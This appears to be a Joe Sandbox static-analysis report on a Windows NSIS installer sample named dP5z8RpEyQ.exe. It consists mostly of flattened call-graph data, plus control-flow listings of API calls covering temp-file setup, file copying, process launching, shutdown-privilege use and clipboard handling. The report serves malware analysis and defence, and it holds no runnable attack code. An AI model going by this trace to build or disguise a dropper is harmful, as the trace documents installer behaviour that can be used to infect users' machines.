3313 403072 3313->3309 3313->3313 3314 4030af SetFilePointer 3313->3314 3314->3309 3315->3297 3315->3302 3315->3309 3315->3311 3459 4032c7 3315->3459 3317 4064dd 5 API calls 3316->3317 3318 4038fb 3317->3318 3319 403901 3318->3319 3320 403913 3318->3320 3498 406032 wsprintfA 3319->3498 3321 405fbb 3 API calls 3320->3321 3323 40393e 3321->3323 3324 40395c lstrcatA 3323->3324 3326 405fbb 3 API calls 3323->3326 3325 403911 3324->3325 3483 403bac 3325->3483 3326->3324 3329 405b5a 18 API calls 3330 40398e 3329->3330 3331 403a17 3330->3331 3333 405fbb 3 API calls 3330->3333 3332 405b5a 18 API calls 3331->3332 3334 403a1d 3332->3334 3335 4039ba 3333->3335 3336 403a2d LoadImageA 3334->3336 3337 406167 17 API calls 3334->3337 3335->3331 3340 4039d6 lstrlenA 3335->3340 3343 405a97 CharNextA 3335->3343 3338 403ad3 3336->3338 3339 403a54 RegisterClassA 3336->3339 3337->3336 3342 40140b 2 API calls 3338->3342 3341 403a8a SystemParametersInfoA CreateWindowExA 3339->3341 3371 403add 3339->3371 3344 4039e4 lstrcmpiA 3340->3344 3345 403a0a 3340->3345 3341->3338 3346 403ad9 3342->3346 3348 4039d4 3343->3348 3344->3345 3349 4039f4 GetFileAttributesA 3344->3349 3347 405a6c 3 API calls 3345->3347 3350 403bac 18 API calls 3346->3350 3346->3371 3351 403a10 3347->3351 3348->3340 3352 403a00 3349->3352 3353 403aea 3350->3353 3499 4060d4 lstrcpynA 3351->3499 3352->3345 3355 405ab3 2 API calls 3352->3355 3356 403af6 ShowWindow 3353->3356 3357 403b79 3353->3357 3355->3345 3359 40646f 3 API calls 3356->3359 3491 4052cd OleInitialize 3357->3491 3361 403b0e 3359->3361 3360 403b7f 3362 403b83 3360->3362 3363 403b9b 3360->3363 3364 403b1c GetClassInfoA 3361->3364 3366 40646f 3 API calls 3361->3366 3369 40140b 2 API calls 3362->3369 3362->3371 3365 40140b 2 API calls 3363->3365 3367 403b30 GetClassInfoA RegisterClassA 3364->3367 3368 403b46 DialogBoxParamA 3364->3368 3365->3371 3366->3364 3367->3368 3370 40140b 2 API calls 3368->3370 3369->3371 3370->3371 3371->3223 3372->3198 3501 4060d4 lstrcpynA 3373->3501 3375 405b6b 3502 405b05 CharNextA CharNextA 3375->3502 3378 403611 3378->3212 3387 4060d4 lstrcpynA 3378->3387 3379 4063af 5 API calls 3385 405b81 3379->3385 3380 405bac lstrlenA 3381 405bb7 3380->3381 3380->3385 3383 405a6c 3 API calls 3381->3383 3384 405bbc GetFileAttributesA 3383->3384 3384->3378 3385->3378 3385->3380 3386 405ab3 2 API calls 3385->3386 3508 406448 FindFirstFileA 3385->3508 3386->3380 3387->3246 3388->3216 3390 405805 3389->3390 3391 403663 ExitProcess 3390->3391 3392 405819 MessageBoxIndirectA 3390->3392 3392->3391 3394 4064dd 5 API calls 3393->3394 3395 403670 lstrcatA 3394->3395 3395->3240 3395->3241 3397 405712 GetLastError 3396->3397 3398 4036b2 3396->3398 3397->3398 3399 405721 SetFileSecurityA 3397->3399 3398->3250 3399->3398 3400 405737 GetLastError 3399->3400 3400->3398 3402 405752 GetLastError 3401->3402 3403 40574e 3401->3403 3402->3403 3403->3250 3404->3252 3405->3264 3407 405ed4 3406->3407 3408 405ec7 3406->3408 3407->3264 3511 405d43 3408->3511 3411 4057b2 3410->3411 3412 4057a6 CloseHandle 3410->3412 3411->3264 3412->3411 3414 403312 3413->3414 3415 405a86 lstrcatA 3413->3415 3414->3284 3415->3414 3417 405ca7 GetTickCount GetTempFileNameA 3416->3417 3418 403323 3417->3418 3419 405cd4 3417->3419 3418->3201 3419->3417 3419->3418 3420->3290 3421->3292 3423 405ac0 3422->3423 3424 402f0d 3423->3424 3425 405ac5 CharPrevA 3423->3425 3426 4060d4 lstrcpynA 3424->3426 3425->3423 3425->3424 3426->3296 3428 402e46 3427->3428 3429 402e5e 3427->3429 3430 402e56 3428->3430 3431 402e4f DestroyWindow 3428->3431 3432 402e66 3429->3432 3433 402e6e GetTickCount 3429->3433 3430->3299 3431->3430 3463 406519 3432->3463 3435 402e7c CreateDialogParamA ShowWindow 3433->3435 3436 402e9f 3433->3436 3435->3436 3436->3299 3438->3305 3440 4030ee 3439->3440 3441 40311c 3440->3441 3480 4032dd SetFilePointer 3440->3480 3442 4032c7 ReadFile 3441->3442 3444 403127 3442->3444 3445 403260 3444->3445 3446 403139 GetTickCount 3444->3446 3448 40324a 3444->3448 3447 4032a2 3445->3447 3452 403264 3445->3452 3446->3448 3455 403165 3446->3455 3449 4032c7 ReadFile 3447->3449 3448->3313 3449->3448 3450 4032c7 ReadFile 3450->3455 3451 4032c7 ReadFile 3451->3452 3452->3448 3452->3451 3453 405d14 WriteFile 3452->3453 3453->3452 3454 4031bb GetTickCount 3454->3455 3455->3448 3455->3450 3455->3454 3456 4031e0 MulDiv wsprintfA 3455->3456 3478 405d14 WriteFile 3455->3478 3467 4051fb 3456->3467 3481 405ce5 ReadFile 3459->3481 3462->3307 3464 406536 PeekMessageA 3463->3464 3465 402e6c 3464->3465 3466 40652c DispatchMessageA 3464->3466 3465->3299 3466->3464 3468 405216 3467->3468 3477 4052b9 3467->3477 3469 405233 lstrlenA 3468->3469 3470 406167 17 API calls 3468->3470 3471 405241 lstrlenA 3469->3471 3472 40525c 3469->3472 3470->3469 3473 405253 lstrcatA 3471->3473 3471->3477 3474 405262 SetWindowTextA 3472->3474 3475 40526f 3472->3475 3473->3472 3474->3475 3476 405275 SendMessageA SendMessageA SendMessageA 3475->3476 3475->3477 3476->3477 3477->3455 3479 405d32 3478->3479 3479->3455 3480->3441 3482 4032da 3481->3482 3482->3315 3484 403bc0 3483->3484 3500 406032 wsprintfA 3484->3500 3486 403c31 3487 403c65 18 API calls 3486->3487 3489 403c36 3487->3489 3488 40396c 3488->3329 3489->3488 3490 406167 17 API calls 3489->3490 3490->3489 3492 4041a4 SendMessageA 3491->3492 3493 4052f0 3492->3493 3496 401389 2 API calls 3493->3496 3497 405317 3493->3497 3494 4041a4 SendMessageA 3495 405329 OleUninitialize 3494->3495 3495->3360 3496->3493 3497->3494 3498->3325 3499->3331 3500->3486 3501->3375 3503 405b20 3502->3503 3505 405b30 3502->3505 3504 405b2b CharNextA 3503->3504 3503->3505 3507 405b50 3504->3507 3506 405a97 CharNextA 3505->3506 3505->3507 3506->3505 3507->3378 3507->3379 3509 406469 3508->3509 3510 40645e FindClose 3508->3510 3509->3385 3510->3509 3512 405d69 3511->3512 3513 405d8f GetShortPathNameA 3511->3513 3538 405c6d GetFileAttributesA CreateFileA 3512->3538 3515 405da4 3513->3515 3516 405eae 3513->3516 3515->3516 3518 405dac wsprintfA 3515->3518 3516->3407 3517 405d73 CloseHandle GetShortPathNameA 3517->3516 3519 405d87 3517->3519 3520 406167 17 API calls 3518->3520 3519->3513 3519->3516 3521 405dd4 3520->3521 3539 405c6d GetFileAttributesA CreateFileA 3521->3539 3523 405de1 3523->3516 3524 405df0 GetFileSize GlobalAlloc 3523->3524 3525 405e12 3524->3525 3526 405ea7 CloseHandle 3524->3526 3527 405ce5 ReadFile 3525->3527 3526->3516 3528 405e1a 3527->3528 3528->3526 3540 405bd2 lstrlenA 3528->3540 3531 405e31 lstrcpyA 3533 405e53 3531->3533 3532 405e45 3534 405bd2 4 API calls 3532->3534 3535 405e8a SetFilePointer 3533->3535 3534->3533 3536 405d14 WriteFile 3535->3536 3537 405ea0 GlobalFree 3536->3537 3537->3526 3538->3517 3539->3523 3541 405c13 lstrlenA 3540->3541 3542 405c1b 3541->3542 3543 405bec lstrcmpiA 3541->3543 3542->3531 3542->3532 3543->3542 3544 405c0a CharNextA 3543->3544 3544->3541 4434 4038a5 4435 4038b0 4434->4435 4436 4038b4 4435->4436 4437 4038b7 GlobalAlloc 4435->4437 4437->4436 4438 402626 4439 40262b 4438->4439 4440 40263f 4438->4440 4441 402bac 17 API calls 4439->4441 4442 402bce 17 API calls 4440->4442 4444 402634 4441->4444 4443 402646 lstrlenA 4442->4443 4443->4444 4445 405d14 WriteFile 4444->4445 4446 402668 4444->4446 4445->4446 4447 40272b 4448 402732 4447->4448 4450 4029aa 4447->4450 4449 402bac 17 API calls 4448->4449 4451 402739 4449->4451 4452 402748 SetFilePointer 4451->4452 4452->4450 4453 402758 4452->4453 4455 406032 wsprintfA 4453->4455 4455->4450 4456 401c2e 4457 402bac 17 API calls 4456->4457 4458 401c35 4457->4458 4459 402bac 17 API calls 4458->4459 4460 401c42 4459->4460 4461 401c57 4460->4461 4462 402bce 17 API calls 4460->4462 4463 401c67 4461->4463 4464 402bce 17 API calls 4461->4464 4462->4461 4465 401c72 4463->4465 4466 401cbe 4463->4466 4464->4463 4468 402bac 17 API calls 4465->4468 4467 402bce 17 API calls 4466->4467 4469 401cc3 4467->4469 4470 401c77 4468->4470 4471 402bce 17 API calls 4469->4471 4472 402bac 17 API calls 4470->4472 4473 401ccc FindWindowExA 4471->4473 4474 401c83 4472->4474 4477 401cea 4473->4477 4475 401c90 SendMessageTimeoutA 4474->4475 4476 401cae SendMessageA 4474->4476 4475->4477 4476->4477 4484 401e35 GetDC 4485 402bac 17 API calls 4484->4485 4486 401e47 GetDeviceCaps MulDiv ReleaseDC 4485->4486 4487 402bac 17 API calls 4486->4487 4488 401e78 4487->4488 4489 406167 17 API calls 4488->4489 4490 401eb5 CreateFontIndirectA 4489->4490 4491 402620 4490->4491 4492 402a35 SendMessageA 4493 402a4f InvalidateRect 4492->4493 4494 402a5a 4492->4494 4493->4494 3665 4057b6 ShellExecuteExA 4495 4014b7 4496 4014bd 4495->4496 4497 401389 2 API calls 4496->4497 4498 4014c5 4497->4498 3707 405339 3708 4054e4 3707->3708 3709 40535b GetDlgItem GetDlgItem GetDlgItem 3707->3709 3711 4054ec GetDlgItem CreateThread CloseHandle 3708->3711 3712 405514 3708->3712 3752 40418d SendMessageA 3709->3752 3711->3712 3755 4052cd 5 API calls 3711->3755 3714 405563 3712->3714 3715 40552a ShowWindow ShowWindow 3712->3715 3716 405542 3712->3716 3713 4053cb 3721 4053d2 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3713->3721 3720 4041bf 8 API calls 3714->3720 3754 40418d SendMessageA 3715->3754 3717 40559d 3716->3717 3718 405552 3716->3718 3719 405576 ShowWindow 3716->3719 3717->3714 3729 4055aa SendMessageA 3717->3729 3723 404131 SendMessageA 3718->3723 3725 405596 3719->3725 3726 405588 3719->3726 3724 40556f 3720->3724 3727 405440 3721->3727 3728 405424 SendMessageA SendMessageA 3721->3728 3723->3714 3731 404131 SendMessageA 3725->3731 3730 4051fb 24 API calls 3726->3730 3732 405453 3727->3732 3733 405445 SendMessageA 3727->3733 3728->3727 3729->3724 3734 4055c3 CreatePopupMenu 3729->3734 3730->3725 3731->3717 3736 404158 18 API calls 3732->3736 3733->3732 3735 406167 17 API calls 3734->3735 3738 4055d3 AppendMenuA 3735->3738 3737 405463 3736->3737 3741 4054a0 GetDlgItem SendMessageA 3737->3741 3742 40546c ShowWindow 3737->3742 3739 4055f1 GetWindowRect 3738->3739 3740 405604 TrackPopupMenu 3738->3740 3739->3740 3740->3724 3743 405620 3740->3743 3741->3724 3746 4054c7 SendMessageA SendMessageA 3741->3746 3744 405482 ShowWindow 3742->3744 3745 40548f 3742->3745 3747 40563f SendMessageA 3743->3747 3744->3745 3753 40418d SendMessageA 3745->3753 3746->3724 3747->3747 3748 40565c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3747->3748 3750 40567e SendMessageA 3748->3750 3750->3750 3751 4056a0 GlobalUnlock SetClipboardData CloseClipboard 3750->3751 3751->3724 3752->3713 3753->3741 3754->3716 4499 402dba 4500 402de2 4499->4500 4501 402dc9 SetTimer 4499->4501 4502 402e37 4500->4502 4503 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4500->4503 4501->4500 4503->4502 3777 4015bb 3778 402bce 17 API calls 3777->3778 3779 4015c2 3778->3779 3780 405b05 4 API calls 3779->3780 3781 4015ca 3780->3781 3782 401624 3781->3782 3783 405a97 CharNextA 3781->3783 3789 40573e 2 API calls 3781->3789 3791 40575b 5 API calls 3781->3791 3793 4015f3 3781->3793 3794 40160c GetFileAttributesA 3781->3794 3784 401652 3782->3784 3785 401629 3782->3785 3783->3781 3787 401423 24 API calls 3784->3787 3797 401423 3785->3797 3795 40164a 3787->3795 3789->3781 3791->3781 3792 40163b SetCurrentDirectoryA 3792->3795 3793->3781 3796 4056c1 4 API calls 3793->3796 3794->3781 3796->3793 3798 4051fb 24 API calls 3797->3798 3799 401431 3798->3799 3800 4060d4 lstrcpynA 3799->3800 3800->3792 4504 40493b 4505 404967 4504->4505 4506 40494b 4504->4506 4508 40499a 4505->4508 4509 40496d SHGetPathFromIDListA 4505->4509 4515 4057d4 GetDlgItemTextA 4506->4515 4511 404984 SendMessageA 4509->4511 4512 40497d 4509->4512 4510 404958 SendMessageA 4510->4505 4511->4508 4514 40140b 2 API calls 4512->4514 4514->4511 4515->4510 4516 4016bb 4517 402bce 17 API calls 4516->4517 4518 4016c1 GetFullPathNameA 4517->4518 4519 4016d8 4518->4519 4525 4016f9 4518->4525 4521 406448 2 API calls 4519->4521 4519->4525 4520 40170d GetShortPathNameA 4522 402a5a 4520->4522 4523 4016e9 4521->4523 4523->4525 4526 4060d4 lstrcpynA 4523->4526 4525->4520 4525->4522 4526->4525

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 403325-403364 SetErrorMode GetVersion 1 403366-40336e call 4064dd 0->1 2 403377 0->2 1->2 7 403370 1->7 4 40337c-40338f call 40646f lstrlenA 2->4 9 403391-4033ad call 4064dd * 3 4->9 7->2 16 4033be-40341c #17 OleInitialize SHGetFileInfoA call 4060d4 GetCommandLineA call 4060d4 9->16 17 4033af-4033b5 9->17 24 403428-40343d call 405a97 CharNextA 16->24 25 40341e-403423 16->25 17->16 21 4033b7 17->21 21->16 28 403502-403506 24->28 25->24 29 403442-403445 28->29 30 40350c 28->30 32 403447-40344b 29->32 33 40344d-403455 29->33 31 40351f-403539 GetTempPathA call 4032f4 30->31 42 403591-4035ab DeleteFileA call 402ea1 31->42 43 40353b-403559 GetWindowsDirectoryA lstrcatA call 4032f4 31->43 32->32 32->33 35 403457-403458 33->35 36 40345d-403460 33->36 35->36 37 4034f2-4034ff call 405a97 36->37 38 403466-40346a 36->38 37->28 57 403501 37->57 40 403482-4034af 38->40 41 40346c-403472 38->41 47 4034b1-4034b7 40->47 48 4034c2-4034f0 40->48 45 403474-403476 41->45 46 403478 41->46 60 4035b1-4035b7 42->60 61 40363f-40364f ExitProcess CoUninitialize 42->61 43->42 59 40355b-40358b GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032f4 43->59 45->40 45->46 46->40 52 4034b9-4034bb 47->52 53 4034bd 47->53 48->37 55 40350e-40351a call 4060d4 48->55 52->48 52->53 53->48 55->31 57->28 59->42 59->61 65 4035b9-4035c4 call 405a97 60->65 66 40362f-403636 call 4038e7 60->66 62 403773-403779 61->62 63 403655-403665 call 4057f0 ExitProcess 61->63 69 4037f5-4037fd 62->69 70 40377b-403794 GetCurrentProcess OpenProcessToken 62->70 80 4035c6-4035ef 65->80 81 4035fa-403604 65->81 73 40363b 66->73 75 403803-403807 ExitProcess 69->75 76 4037ff 69->76 78 4037c6-4037d4 call 4064dd 70->78 79 403796-4037c0 LookupPrivilegeValueA AdjustTokenPrivileges 70->79 73->61 76->75 90 4037e2-4037ec ExitWindowsEx 78->90 91 4037d6-4037e0 78->91 79->78 83 4035f1-4035f3 80->83 84 403606-403613 call 405b5a 81->84 85 40366b-40367f call 40575b lstrcatA 81->85 83->81 87 4035f5-4035f8 83->87 84->61 98 403615-40362b call 4060d4 * 2 84->98 96 403681-403687 lstrcatA 85->96 97 40368c-4036a6 lstrcatA lstrcmpiA 85->97 87->81 87->83 90->69 92 4037ee-4037f0 call 40140b 90->92 91->90 91->92 92->69 96->97 97->61 100 4036a8-4036ab 97->100 98->66 102 4036b4 call 40573e 100->102 103 4036ad-4036b2 call 4056c1 100->103 108 4036b9-4036c6 SetCurrentDirectoryA 102->108 103->108 111 4036d3-4036fb call 4060d4 108->111 112 4036c8-4036ce call 4060d4 108->112 116 403701-40371d call 406167 DeleteFileA 111->116 112->111 119 40375e-403765 116->119 120 40371f-40372f CopyFileA 116->120 119->116 121 403767-40376e call 405eb3 119->121 120->119 122 403731-403751 call 405eb3 call 406167 call 405773 120->122 121->61 122->119 131 403753-40375a CloseHandle 122->131 131->119
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE ref: 0040334A
                                                                                                    • GetVersion.KERNEL32 ref: 00403350
                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403383
                                                                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033BF
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004033C6
                                                                                                    • SHGetFileInfoA.SHELL32(0079E528,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033E2
                                                                                                    • GetCommandLineA.KERNEL32(Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004033F7
                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",00000020,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",00000000,?,00000007,00000009,0000000B), ref: 00403433
                                                                                                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403530
                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403541
                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354D
                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403561
                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403569
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040357A
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403582
                                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403596
                                                                                                      • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                      • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                      • Part of subcall function 004038E7: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,75923410), ref: 004039D7
                                                                                                      • Part of subcall function 004038E7: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
                                                                                                      • Part of subcall function 004038E7: GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
                                                                                                      • Part of subcall function 004038E7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
                                                                                                      • Part of subcall function 004038E7: RegisterClassA.USER32(007A2700), ref: 00403A7B
                                                                                                    • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 0040363F
                                                                                                      • Part of subcall function 0040380D: CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                                                                    • CoUninitialize.COMBASE(?,?,00000007,00000009,0000000B), ref: 00403644
                                                                                                    • ExitProcess.KERNEL32 ref: 00403665
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 00403782
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403789
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A1
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C0
                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004037E4
                                                                                                    • ExitProcess.KERNEL32 ref: 00403807
                                                                                                      • Part of subcall function 004057F0: MessageBoxIndirectA.USER32(0040A218), ref: 0040584B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                    • String ID: "$"C:\Users\user\Desktop\dP5z8RpEyQ.exe"$(y$.tmp$1033$Bysamfund$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution$C:\Users\user\Desktop$C:\Users\user\Desktop\dP5z8RpEyQ.exe$Error launching installer$Haste.n$$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                    • API String ID: 562314493-3078951025
                                                                                                    • Opcode ID: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
                                                                                                    • Instruction ID: 97d63beb8df843ca38620017436ed0801945ee3064957e10bbaedf14490df2b6
                                                                                                    • Opcode Fuzzy Hash: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
                                                                                                    • Instruction Fuzzy Hash: B6C1F7705047816ED7216F759D89A2F3EACAB86306F05453EF182B61D2CB7C8A15CB2F

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 132 405339-405355 133 4054e4-4054ea 132->133 134 40535b-405422 GetDlgItem * 3 call 40418d call 404a7e GetClientRect GetSystemMetrics SendMessageA * 2 132->134 136 405514-405520 133->136 137 4054ec-40550e GetDlgItem CreateThread CloseHandle 133->137 156 405440-405443 134->156 157 405424-40543e SendMessageA * 2 134->157 139 405542-405548 136->139 140 405522-405528 136->140 137->136 144 40554a-405550 139->144 145 40559d-4055a0 139->145 142 405563-40556a call 4041bf 140->142 143 40552a-40553d ShowWindow * 2 call 40418d 140->143 153 40556f-405573 142->153 143->139 146 405552-40555e call 404131 144->146 147 405576-405586 ShowWindow 144->147 145->142 150 4055a2-4055a8 145->150 146->142 154 405596-405598 call 404131 147->154 155 405588-405591 call 4051fb 147->155 150->142 158 4055aa-4055bd SendMessageA 150->158 154->145 155->154 161 405453-40546a call 404158 156->161 162 405445-405451 SendMessageA 156->162 157->156 163 4055c3-4055ef CreatePopupMenu call 406167 AppendMenuA 158->163 164 4056ba-4056bc 158->164 171 4054a0-4054c1 GetDlgItem SendMessageA 161->171 172 40546c-405480 ShowWindow 161->172 162->161 169 4055f1-405601 GetWindowRect 163->169 170 405604-40561a TrackPopupMenu 163->170 164->153 169->170 170->164 173 405620-40563a 170->173 171->164 176 4054c7-4054df SendMessageA * 2 171->176 174 405482-40548d ShowWindow 172->174 175 40548f 172->175 177 40563f-40565a SendMessageA 173->177 178 405495-40549b call 40418d 174->178 175->178 176->164 177->177 179 40565c-40567c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 177->179 178->171 181 40567e-40569e SendMessageA 179->181 181->181 182 4056a0-4056b4 GlobalUnlock SetClipboardData CloseClipboard 181->182 182->164
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053A7
                                                                                                    • GetClientRect.USER32(?,?), ref: 004053E4
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053EB
                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040540C
                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040541D
                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405430
                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040543E
                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405451
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405487
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054A8
                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054B8
                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054D1
                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054DD
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053B6
                                                                                                      • Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054F9
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000052CD,00000000), ref: 00405507
                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040550E
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405531
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405538
                                                                                                    • ShowWindow.USER32(00000008), ref: 0040557E
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055B2
                                                                                                    • CreatePopupMenu.USER32 ref: 004055C3
                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055D8
                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 004055F8
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564D
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040565D
                                                                                                    • EmptyClipboard.USER32 ref: 00405663
                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405676
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040568A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056A3
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056AE
                                                                                                    • CloseClipboard.USER32 ref: 004056B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
